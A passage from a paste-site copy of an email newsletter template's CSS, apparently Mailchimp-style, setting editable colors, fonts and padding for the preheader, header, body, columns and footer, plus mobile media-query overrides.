  973. @tip Set the styling for your email's preheader text. Choose a size and color that is easy to read.
  974. */
  975. #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  976. /*@editable*/color:#656565;
  977. /*@editable*/font-family:Helvetica;
  978. /*@editable*/font-size:12px;
  979. /*@editable*/line-height:150%;
  980. /*@editable*/text-align:left;
  981. }
  982. /*
  983. @tab Preheader
  984. @section Preheader Link
  985. @tip Set the styling for your email's preheader links. Choose a color that helps them stand out from your text.
  986. */
  987. #templatePreheader .mcnTextContent a,#templatePreheader .mcnTextContent p a{
  988. /*@editable*/color:#656565;
  989. /*@editable*/font-weight:normal;
  990. /*@editable*/text-decoration:underline;
  991. }
  992. /*
  993. @tab Header
  994. @section Header Style
  995. @tip Set the background color and borders for your email's header area.
  996. */
  997. #templateHeader{
  998. /*@editable*/background-color:#FFFFFF;
  999. /*@editable*/background-image:none;
  1000. /*@editable*/background-repeat:no-repeat;
  1001. /*@editable*/background-position:center;
  1002. /*@editable*/background-size:cover;
  1003. /*@editable*/border-top:0;
  1004. /*@editable*/border-bottom:0;
  1005. /*@editable*/padding-top:9px;
  1006. /*@editable*/padding-bottom:0;
  1007. }
  1008. /*
  1009. @tab Header
  1010. @section Header Text
  1011. @tip Set the styling for your email's header text. Choose a size and color that is easy to read.
  1012. */
  1013. #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  1014. /*@editable*/color:#202020;
  1015. /*@editable*/font-family:Helvetica;
  1016. /*@editable*/font-size:16px;
  1017. /*@editable*/line-height:150%;
  1018. /*@editable*/text-align:left;
  1019. }
  1020. /*
  1021. @tab Header
  1022. @section Header Link
  1023. @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  1024. */
  1025. #templateHeader .mcnTextContent a,#templateHeader .mcnTextContent p a{
  1026. /*@editable*/color:#2BAADF;
  1027. /*@editable*/font-weight:normal;
  1028. /*@editable*/text-decoration:underline;
  1029. }
  1030. /*
  1031. @tab Body
  1032. @section Body Style
  1033. @tip Set the background color and borders for your email's body area.
  1034. */
  1035. #templateBody{
  1036. /*@editable*/background-color:#FFFFFF;
  1037. /*@editable*/background-image:none;
  1038. /*@editable*/background-repeat:no-repeat;
  1039. /*@editable*/background-position:center;
  1040. /*@editable*/background-size:cover;
  1041. /*@editable*/border-top:0;
  1042. /*@editable*/border-bottom:0;
  1043. /*@editable*/padding-top:0;
  1044. /*@editable*/padding-bottom:0;
  1045. }
  1046. /*
  1047. @tab Body
  1048. @section Body Text
  1049. @tip Set the styling for your email's body text. Choose a size and color that is easy to read.
  1050. */
  1051. #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  1052. /*@editable*/color:#202020;
  1053. /*@editable*/font-family:Helvetica;
  1054. /*@editable*/font-size:16px;
  1055. /*@editable*/line-height:150%;
  1056. /*@editable*/text-align:left;
  1057. }
  1058. /*
  1059. @tab Body
  1060. @section Body Link
  1061. @tip Set the styling for your email's body links. Choose a color that helps them stand out from your text.
  1062. */
  1063. #templateBody .mcnTextContent a,#templateBody .mcnTextContent p a{
  1064. /*@editable*/color:#2BAADF;
  1065. /*@editable*/font-weight:normal;
  1066. /*@editable*/text-decoration:underline;
  1067. }
  1068. /*
  1069. @tab Columns
  1070. @section Column Style
  1071. @tip Set the background color and borders for your email's columns.
  1072. */
  1073. #templateColumns{
  1074. /*@editable*/background-color:#FFFFFF;
  1075. /*@editable*/background-image:none;
  1076. /*@editable*/background-repeat:no-repeat;
  1077. /*@editable*/background-position:center;
  1078. /*@editable*/background-size:cover;
  1079. /*@editable*/border-top:0;
  1080. /*@editable*/border-bottom:2px solid #EAEAEA;
  1081. /*@editable*/padding-top:0;
  1082. /*@editable*/padding-bottom:9px;
  1083. }
  1084. /*
  1085. @tab Columns
  1086. @section Column Text
  1087. @tip Set the styling for your email's column text. Choose a size and color that is easy to read.
  1088. */
  1089. #templateColumns .columnContainer .mcnTextContent,#templateColumns .columnContainer .mcnTextContent p{
  1090. /*@editable*/color:#202020;
  1091. /*@editable*/font-family:Helvetica;
  1092. /*@editable*/font-size:16px;
  1093. /*@editable*/line-height:150%;
  1094. /*@editable*/text-align:left;
  1095. }
  1096. /*
  1097. @tab Columns
  1098. @section Column Link
  1099. @tip Set the styling for your email's column links. Choose a color that helps them stand out from your text.
  1100. */
  1101. #templateColumns .columnContainer .mcnTextContent a,#templateColumns .columnContainer .mcnTextContent p a{
  1102. /*@editable*/color:#2BAADF;
  1103. /*@editable*/font-weight:normal;
  1104. /*@editable*/text-decoration:underline;
  1105. }
  1106. /*
  1107. @tab Footer
  1108. @section Footer Style
  1109. @tip Set the background color and borders for your email's footer area.
  1110. */
  1111. #templateFooter{
  1112. /*@editable*/background-color:#FAFAFA;
  1113. /*@editable*/background-image:none;
  1114. /*@editable*/background-repeat:no-repeat;
  1115. /*@editable*/background-position:center;
  1116. /*@editable*/background-size:cover;
  1117. /*@editable*/border-top:0;
  1118. /*@editable*/border-bottom:0;
  1119. /*@editable*/padding-top:9px;
  1120. /*@editable*/padding-bottom:9px;
  1121. }
  1122. /*
  1123. @tab Footer
  1124. @section Footer Text
  1125. @tip Set the styling for your email's footer text. Choose a size and color that is easy to read.
  1126. */
  1127. #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  1128. /*@editable*/color:#656565;
  1129. /*@editable*/font-family:Helvetica;
  1130. /*@editable*/font-size:12px;
  1131. /*@editable*/line-height:150%;
  1132. /*@editable*/text-align:center;
  1133. }
  1134. /*
  1135. @tab Footer
  1136. @section Footer Link
  1137. @tip Set the styling for your email's footer links. Choose a color that helps them stand out from your text.
  1138. */
  1139. #templateFooter .mcnTextContent a,#templateFooter .mcnTextContent p a{
  1140. /*@editable*/color:#656565;
  1141. /*@editable*/font-weight:normal;
  1142. /*@editable*/text-decoration:underline;
  1143. }
  1144. @media only screen and (min-width:768px){
  1145. .templateContainer{
  1146. width:600px !important;
  1147. }
  1148.  
  1149. } @media only screen and (max-width: 480px){
  1150. body,table,td,p,a,li,blockquote{
  1151. -webkit-text-size-adjust:none !important;
  1152. }
  1153.  
  1154. } @media only screen and (max-width: 480px){
  1155. body{
  1156. width:100% !important;
  1157. min-width:100% !important;
  1158. }
  1159.  
  1160. } @media only screen and (max-width: 480px){
  1161. #bodyCell{
  1162. padding-top:10px !important;
  1163. }
  1164.  
  1165. } @media only screen and (max-width: 480px){
  1166. .columnWrapper{
  1167. max-width:100% !important;
  1168. width:100% !important;
  1169. }
  1170.  
  1171. } @media only screen and (max-width: 480px){
  1172. .mcnImage{
  1173. width:100% !important;
  1174. }
  1175.  
  1176. } @media only screen and (max-width: 480px){
  1177. .mcnCartContainer,.mcnCaptionTopContent,.mcnRecContentContainer,.mcnCaptionBottomContent,.mcnTextContentContainer,.mcnBoxedTextContentContainer,.mcnImageGroupContentContainer,.mcnCaptionLeftTextContentContainer,.mcnCaptionRightTextContentContainer,.mcnCaptionLeftImageContentContainer,.mcnCaptionRightImageContentContainer,.mcnImageCardLeftTextContentContainer,.mcnImageCardRightTextContentContainer{
  1178. max-width:100% !important;
  1179. width:100% !important;
  1180. }
  1181.  
  1182. } @media only screen and (max-width: 480px){
  1183. .mcnBoxedTextContentContainer{
  1184. min-width:100% !important;
  1185. }
  1186.  
  1187. } @media only screen and (max-width: 480px){
  1188. .mcnImageGroupContent{
  1189. padding:9px !important;
  1190. }
  1191.  
  1192. } @media only screen and (max-width: 480px){
  1193. .mcnCaptionLeftContentOuter .mcnTextContent,.mcnCaptionRightContentOuter .mcnTextContent{
  1194. padding-top:9px !important;
  1195. }
  1196.  
  1197. } @media only screen and (max-width: 480px){
  1198. .mcnImageCardTopImageContent,.mcnCaptionBlockInner .mcnCaptionTopContent:last-child .mcnTextContent{
  1199. padding-top:18px !important;
  1200. }
  1201.  
  1202. } @media only screen and (max-width: 480px){
  1203. .mcnImageCardBottomImageContent{
  1204. padding-bottom:9px !important;
  1205. }
  1206.  
  1207. } @media only screen and (max-width: 480px){
  1208. .mcnImageGroupBlockInner{
  1209. padding-top:0 !important;
  1210. padding-bottom:0 !important;
  1211. }
  1212.  
  1213. } @media only screen and (max-width: 480px){
  1214. .mcnImageGroupBlockOuter{
  1215. padding-top:9px !important;
  1216. padding-bottom:9px !important;
  1217. }
  1218.  
  1219. } @media only screen and (max-width: 480px){
  1220. .mcnTextContent,.mcnBoxedTextContentColumn{
  1221. padding-right:18px !important;
  1222. padding-left:18px !important;
  1223. }
  1224.  
  1225. } @media only screen and (max-width: 480px){
  1226. .mcnImageCardLeftImageContent,.mcnImageCardRightImageContent{
  1227. padding-right:18px !important;
  1228. padding-bottom:0 !important;
  1229. padding-left:18px !important;
  1230. }
  1231.  
  1232. } @media only screen and (max-width: 480px){
  1233. .mcpreview-image-uploader{
  1234. display:none !important;
  1235. width:100% !important;
  1236. }
  1237.  
  1238. } @media only screen and (max-width: 480px){
  1239. /*
  1240. @tab Mobile Styles
  1241. @section Heading 1
  1242. @tip Make the first-level headings larger in size for better readability on small screens.
  1243. */
  1244. h1{
  1245. /*@editable*/font-size:22px !important;
  1246. /*@editable*/line-height:125% !important;
  1247. }
  1248.  
  1249. } @media only screen and (max-width: 480px){
  1250. /*
  1251. @tab Mobile Styles
  1252. @section Heading 2
  1253. @tip Make the second-level headings larger in size for better readability on small screens.
  1254. */
  1255. h2{
  1256. /*@editable*/font-size:20px !important;
  1257. /*@editable*/line-height:125% !important;
  1258. }
  1259.  
  1260. } @media only screen and (max-width: 480px){
  1261. /*
  1262. @tab Mobile Styles
  1263. @section Heading 3
  1264. @tip Make the third-level headings larger in size for better readability on small screens.
  1265. */
  1266. h3{
  1267. /*@editable*/font-size:18px !important;
  1268. /*@editable*/line-height:125% !important;
  1269. }
  1270.  
  1271. } @media only screen and (max-width: 480px){
  1272. /*
  1273. @tab Mobile Styles
  1274. @section Heading 4
  1275. @tip Make the fourth-level headings larger in size for better readability on small screens.
  1276. */
  1277. h4{
  1278. /*@editable*/font-size:16px !important;
  1279. /*@editable*/line-height:150% !important;
  1280. }
  1281.  
  1282. } @media only screen and (max-width: 480px){
  1283. /*
  1284. @tab Mobile Styles
  1285. @section Boxed Text
  1286. @tip Make the boxed text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  1287. */
  1288. .mcnBoxedTextContentContainer .mcnTextContent,.mcnBoxedTextContentContainer .mcnTextContent p{
  1289. /*@editable*/font-size:14px !important;
  1290. /*@editable*/line-height:150% !important;
  1291. }
  1292.  
  1293. } @media only screen and (max-width: 480px){
  1294. /*
  1295. @tab Mobile Styles
  1296. @section Preheader Visibility
  1297. @tip Set the visibility of the email's preheader on small screens. You can hide it to save space.
  1298. */
  1299. #templatePreheader{
  1300. /*@editable*/display:block !important;
  1301. }
  1302.  
  1303. } @media only screen and (max-width: 480px){
  1304. /*
  1305. @tab Mobile Styles
  1306. @section Preheader Text
  1307. @tip Make the preheader text larger in size for better readability on small screens.
  1308. */
  1309. #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  1310. /*@editable*/font-size:14px !important;
  1311. /*@editable*/line-height:150% !important;
  1312. }
  1313.  
  1314. } @media only screen and (max-width: 480px){
  1315. /*
  1316. @tab Mobile Styles
  1317. @section Header Text
  1318. @tip Make the header text larger in size for better readability on small screens.
  1319. */
  1320. #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  1321. /*@editable*/font-size:16px !important;
  1322. /*@editable*/line-height:150% !important;
  1323. }
  1324.  
  1325. } @media only screen and (max-width: 480px){
  1326. /*
  1327. @tab Mobile Styles
  1328. @section Body Text
  1329. @tip Make the body text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  1330. */
  1331. #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  1332. /*@editable*/font-size:16px !important;
  1333. /*@editable*/line-height:150% !important;
  1334. }
  1335.  
  1336. } @media only screen and (max-width: 480px){
  1337. /*
  1338. @tab Mobile Styles
  1339. @section Column Text
  1340. @tip Make the column text larger in size for better readability on small
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement